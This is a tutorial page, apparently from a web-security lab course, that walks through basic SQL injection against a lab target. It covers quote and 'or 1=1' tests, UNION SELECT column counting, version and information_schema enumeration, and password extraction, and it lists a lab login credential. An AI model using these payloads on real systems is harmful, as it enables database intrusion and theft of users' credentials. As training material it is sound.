search

4. Basic SQL Injection Attacks

NOTE: When searching for any vulnerability, try to think of what is the actual intention of a developer with specific functionality that you find on the respective web pages.

In order to do some basic SQL injection testing we could:

  1. Start with testing the characters ' ''

  2. Test with a space to see if it's looking for an exact match or not: jeremy j

  3. Test with operators: jeremy' or 1=1# / jeremy' or 1=1-- -

  4. Try to exfiltrate more data once you find potential SQL injection.

  5. jeremy' union select null# - returns nothing

  6. jeremy' union select null,null# - returns nothing

  7. jeremy' union select null,null,null# - returns data which means that behind the query there is a third hidden column aside username and e-mail that pulls up some other data that it doesn't show up

  8. For further testing it might be that the page retrieves the version of the database or something else let's try getting the version with: jeremy' union select null,null,version()# - returns the version such as 8.0.34

  9. Now since we have this let's see if we can get more information maybe the name of the tables present in the db:jeremy' union select null,null,table_name from information_schema.tables#

  10. We could try to get also the column names to find more informationjeremy' union select null,null,column_name from information_schema.columns#

Discovery: for this specific example we can start directly with the ' char as they didn't specifically went ahead and protected for that.

  1. Now since we managed to exfiltrate a bunch of data about columns and tables it's time to test to see if we can extract the user's password:jeremy' union select null,null,password from injection0x01#

A small constraint we should look for is that some fields might be of different var types like int, float, string etc. Most often than not we would have probably int / string and in case we select the incorrect type of variable we might end up getting some errors. In this case we might have to play around with the syntax in order to achieve the injection and match the types.

Example: in case the database would use a first column that serves as id we could play with something like:

jeremy' union select null(int),1,null,null from injection0x01#

NOTE: Even though in this example we targeted specifically the password field we can try to exfiltrate other data such as ids, usernames, e-mails etc.

hashtag
SQL Injection Cheat Sheet - PortSwigger

https://portswigger.net/web-security/sql-injection/cheat-sheet

user: takeshi:onigirigadaisuki

Previous3. SQL Injection IntroductionNext5. Lab - Injection 0x02